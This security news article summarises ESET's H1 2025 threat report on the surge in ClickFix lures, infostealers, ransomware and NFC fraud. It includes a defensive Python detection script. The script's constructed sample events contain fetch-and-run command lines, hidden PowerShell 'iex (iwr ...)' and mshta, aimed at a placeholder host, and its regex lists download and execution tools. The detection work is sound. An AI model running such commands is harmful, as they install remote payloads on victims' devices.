ClickFix attacks skyrocketing more than 500%
ClickFix, a deceptive attack method, saw a surge of more than 500% in the first half of 2025, making it the second most common attack vector after phishing, according to ESET’s latest Threat Report. The report, which looks at trends from December 2024 to May 2025, found that ClickFix accounted for nearly 8% of all blocked attacks during this period.
Fake reCAPTCHA check instructing the victim to paste and execute a malicious command on their device (Source: ESET)
ClickFix attacks trick users by showing a fake error message (or a fake verification prompt, as in the reCAPTCHA lure above) that instructs them to copy, paste, and run harmful commands on their own devices. Because the victim executes the command themselves, the method works across all major operating systems, including Windows, Linux, and macOS.
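Added example, not from the ESET report: a small triage check that flags process-creation events matching the ClickFix pattern described above, a command interpreter launched from an interactive shell with a command line that fetches and runs remote content. The event field names and the assumption that a pasted command is launched from the Windows Run dialog or File Explorer (parent process explorer.exe) are this example's own; the sample events are constructed.

```python
import re

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (iwr http://example.invalid/fix)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://example.invalid/captcha"},
    {"parent": r"C:\Program Files\Code\Code.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c "npm run build"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c ipconfig /all"},
]

# Assumption: a user-pasted command (Win+R Run dialog, Explorer address bar)
# shows up with explorer.exe as the parent process.
INTERACTIVE_PARENTS = ("explorer.exe",)
# Interpreters that ClickFix lures typically have the victim invoke.
SHELL_IMAGES = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe")
# Indicators that the command line pulls remote content or runs it hidden/encoded.
REMOTE_FETCH = re.compile(
    r"(https?://|\biwr\b|invoke-webrequest|downloadstring|\bcurl\b|\bwget\b"
    r"|-enc\w*\s|\biex\b|invoke-expression|-w(indowstyle)?\s+hidden)",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_clickfix_candidate(event: dict) -> bool:
    """True when an interactive parent spawns a shell that fetches remote content."""
    if basename(event["parent"]) not in INTERACTIVE_PARENTS:
        return False
    if basename(event["image"]) not in SHELL_IMAGES:
        return False
    return bool(REMOTE_FETCH.search(event["cmdline"]))


def triage(events: list) -> list:
    """Filter a batch of events down to the ClickFix candidates for analyst review."""
    return [e for e in events if is_clickfix_candidate(e)]


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print("ClickFix candidate:", hit["cmdline"])
```

A developer build launched from an IDE and a plain ipconfig run from the Run dialog both pass, so the check keys on the combination of interactive parent, interpreter and remote fetch rather than on any one of them.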
Jiří Kropáč, Director of Threat Prevention Labs at ESET said: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”
Infostealers
The infostealer landscape shifted noticeably in the first half of 2025. As Agent Tesla declined, SnakeStealer (also known as Snake Keylogger) became the most commonly detected infostealer in ESET’s telemetry. It can log keystrokes, steal saved credentials, take screenshots, and collect clipboard data.
ESET also took part in major disruption efforts against Lumma Stealer and Danabot, two malware-as-a-service tools. Before those operations, Lumma Stealer activity rose 21% compared to the second half of 2024, while Danabot jumped 52%. Both were active threats, which made taking them down especially important.
Ransomware
The ransomware scene grew more chaotic in 2024, with clashes between rival gangs affecting several major players, including RansomHub, one of the leading ransomware-as-a-service groups. While the number of attacks and active gangs increased over the year, ransom payments dropped.
This gap may reflect the impact of law enforcement takedowns and exit scams that disrupted the market, but it could also point to growing distrust in gangs following through on their promises after payment.
Mobile
On Android, adware detections rose by 160%, mainly due to a new threat called Kaleidoscope. This malware uses a lookalike app tactic to trick users into installing fake apps that flood devices with ads and slow them down.
NFC-based fraud also increased more than 35-fold, driven by phishing campaigns and new relay techniques. While the total number of cases is still relatively low, the sharp rise shows how quickly attackers are adapting and continuing to target NFC technology.
ESET’s research into GhostTap shows how attackers steal card details and load them into digital wallets to make fraudulent contactless payments. These operations are often run by organized fraud groups using multiple phones to scale up the attacks. Another tool, SuperCard X, offers NFC theft as a barebones malware-as-a-service kit. Disguised as a legitimate NFC app, it silently captures and relays card data from infected devices in real time, enabling fast fraudulent transactions.